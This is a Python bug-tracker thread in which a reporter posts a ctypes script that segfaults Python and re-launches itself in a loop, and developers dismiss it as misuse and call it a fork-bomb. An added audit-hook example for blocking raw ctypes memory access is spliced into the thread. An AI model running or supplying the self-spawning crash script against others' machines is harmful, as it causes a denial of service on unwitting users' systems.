[issue26508] Infinite crash leading to DoS

2016-03-09 Thread STINNER Victor

STINNER Victor added the comment:

"Then it is no bug that it crashes python?"

The bug is your program creating inconsistent data. Without ctypes, you cannot 
create such inconsistent data.

"Is a crash not a bug?"

There are various ways to "crash" Python, but most of them are deliberate bugs. 
For example:

haypo@selma$ python3
Python 3.4.3 (default, Jun 29 2015, 12:16:01) 
[GCC 5.1.1 20150618 (Red Hat 5.1.1-4)] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import ctypes
>>> ctypes.string_at(0)
Erreur de segmentation (core dumped)

ctypes doesn't prevent you from making mistakes. If you use ctypes, you 
must be very careful and understand what you are doing.

--

___
Python tracker 

___
___
Python-bugs-list mailing list
Unsubscribe: 
https://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
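
The behaviour discussed above (ctypes reading a raw address with no checks) can be observed and denied by an embedding application. This is an added example, not code from the thread or from CPython; it assumes Python 3.8+ audit hooks, and `run_guarded`, `RawMemoryAccessDenied` and `blocked` are names made up here.

```python
import ctypes
import sys

# Audit events CPython (3.8+) raises before ctypes touches a raw address.
RAW_MEMORY_EVENTS = {"ctypes.cdata", "ctypes.string_at", "ctypes.wstring_at"}

blocked = []       # (event, args) tuples recorded by the hook
_enforce = False   # audit hooks cannot be removed, so gate them with a flag


class RawMemoryAccessDenied(RuntimeError):
    """Raised by the hook in place of the raw memory access."""


def _hook(event, args):
    # Runs for every audit event in the process, so keep it cheap.
    if _enforce and event in RAW_MEMORY_EVENTS:
        blocked.append((event, args))
        raise RawMemoryAccessDenied(f"{event}{args!r} denied by audit hook")


sys.addaudithook(_hook)


def run_guarded(func):
    """Call func() with raw-address ctypes calls denied; return (result, error)."""
    global _enforce
    _enforce = True
    try:
        return func(), None
    except RawMemoryAccessDenied as exc:
        return None, exc
    finally:
        _enforce = False


def demo():
    buf = ctypes.create_string_buffer(b"ok")   # constructed, valid memory
    addr = ctypes.addressof(buf)
    return [
        run_guarded(lambda: ctypes.string_at(addr, 2)),               # denied
        run_guarded(lambda: (ctypes.c_char * 2).from_address(addr)),  # denied
        run_guarded(lambda: buf.value),          # ordinary use still works
    ]


if __name__ == "__main__":
    for result, error in demo():
        print(result, "|", error)
```

Audit hooks give visibility, not containment: they are not a sandbox, so treat a denied event as a detection signal rather than a security boundary.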



[issue26508] Infinite crash leading to DoS

2016-03-08 Thread Brett Cannon

Brett Cannon added the comment:

Victor's point is that this isn't a bug because you are manipulating the C API 
to make this occur. That means there is no safety guarantee and thus this is 
not a bug but simply a misuse of the C API.

--
nosy: +brett.cannon
resolution: works for me -> not a bug
status: open -> closed




[issue26508] Infinite crash leading to DoS

2016-03-08 Thread pablo sacristan

Changes by pablo sacristan:


--
status: closed -> open




[issue26508] Infinite crash leading to DoS

2016-03-08 Thread pablo sacristan

pablo sacristan added the comment:

New content for crash.py:

import ctypes, struct, sys, os
inner = ()
outer = (inner,)
c_outer = (ctypes.c_char * sys.getsizeof(outer)).from_address(id(outer))
inner_index = c_outer[:].find(struct.pack('P', id(inner)))
c_outer[inner_index:inner_index+struct.calcsize('P')] = struct.pack('P', id(outer))
print outer

--




[issue26508] Infinite crash leading to DoS

2016-03-08 Thread pablo sacristan

pablo sacristan added the comment:

Then it is no bug that it crashes python? You don't have to put it in a loop, 
but by looping it I am adding the part that makes it take more time but will 
keep on crashing infinitely. Take away the while loop but not what it has 
inside, then also delete the os.system(), and you get Python to crash once. 
Is a crash not a bug?

--
resolution: not a bug -> works for me




[issue26508] Infinite crash leading to DoS

2016-03-08 Thread STINNER Victor

STINNER Victor added the comment:

> "construct and print a self-referencing tuple"

I don't understand the use case here. In pure Python, you cannot build a 
self-referencing tuple!?

Yeah, using the C API or by modifying bytes directly in the memory, you can do 
that. But if you start to use the C API, you must be careful. The C API is 
designed for speed, not to prevent bugs.

I don't think that we should fix anything in Python. I don't consider that it's 
a bug in Python.


> run it and wait around 10 sec for it to happen, but once it starts you will 
> be forced to force it to shut because it will keep on crashing infinitely 
> which is extremely annoying,

Basically, crash.py is a fork-bomb: the program starts itself in a loop. It's 
not a bug in Python.

--
nosy: +haypo
resolution:  -> not a bug
status: open -> closed




[issue26508] Infinite crash leading to DoS

2016-03-07 Thread pablo sacristan

New submission from pablo sacristan:

import ctypes, struct, sys, os
while 1:
os.system('python /Users/pabstersac/Desktop/Python\ Files/crash.py') #Change to your full path to the file
inner = ()
outer = (inner,)
c_outer = (ctypes.c_char * sys.getsizeof(outer)).from_address(id(outer))
inner_index = c_outer[:].find(struct.pack('P', id(inner)))
c_outer[inner_index:inner_index+struct.calcsize('P')] = struct.pack('P', id(outer))
print outer
#construct and print a self-referencing tuple

Run it and wait around 10 sec for it to happen, but once it starts you will be 
forced to force it to shut because it will keep on crashing infinitely, which is 
extremely annoying, and even while it says it crashed it still runs and keeps 
on running infinitely, which if you do on an unsuspecting victim, they will 
probably shut down the computer directly.
There are basically two problems here: the way you construct and then print a 
self-referencing tuple, and the way you handle when it is put in an infinite 
loop with itself calling its own file (which, if you wait long enough, you will 
see the effect goes quicker every second, it goes up exponentially) and you 
don't stop it correctly.

--
files: crash.py
messages: 261319
nosy: pabstersac
priority: normal
severity: normal
status: open
title: Infinite crash leading to DoS
type: security
Added file: http://bugs.python.org/file42088/crash.py
